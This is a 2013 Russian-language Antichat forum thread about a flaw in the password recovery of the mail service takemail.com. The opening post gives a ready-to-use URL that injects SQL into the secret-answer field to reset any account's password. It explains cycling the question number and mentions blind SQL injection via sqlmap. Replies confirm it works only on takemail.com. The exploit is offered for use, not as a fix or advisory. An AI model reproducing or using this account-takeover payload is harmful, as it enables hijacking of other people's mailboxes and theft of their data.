HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 08.12.2013, 04:02
psihoz26
Постоянный
Регистрация: 22.11.2010
Сообщений: 545
С нами: 8142806

Репутация: 324


По умолчанию

Для смены пароля нужно перейти по ссылке ниже предварительно подставив нужные переменные.

Код:
http://takemail.com/takemail/services/recover.cgi?step=1&action=recover&login_recover=[ЛОГИН]%40takemail.com&mail_secretanswer=qwerty'+union+select+1+--+&mail_secretquestion=1&password1=[НОВЫЙ ПАРОЛЬ]&password2=[НОВЫЙ ПАРОЛЬ]
Если вы увидите ошибку говорящую вам о том что не верен ответ на секретный вопрос то вам нужно поменять номер вопроса

Для этого меняем mail_secretquestion=* в ссылке

Всего их 8 (от 1 до 8)

Как многие поняли тут ещё sql иньекция.

Курится через boolean based blind, например скульмапом но оченьмедленно и криво =\
 
Ответить с цитированием

  #2  
Старый 15.12.2013, 23:23
Bremen
Познающий
Регистрация: 21.09.2012
Сообщений: 33
С нами: 7179446

Репутация: 0
По умолчанию

Сменить пароль на любой почте(майл, яндакс, гмайл и т.д.) или на любой учетке в почте takemail?
 
Ответить с цитированием

  #3  
Старый 16.12.2013, 10:57
WallHack
Постоянный
Регистрация: 18.07.2013
Сообщений: 300
С нами: 6747446

Репутация: 32
По умолчанию

Цитата:
Сообщение от None  
psihoz26
Интересно

Цитата:
Сообщение от None  
Bremen
Нет только в takemail.com
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.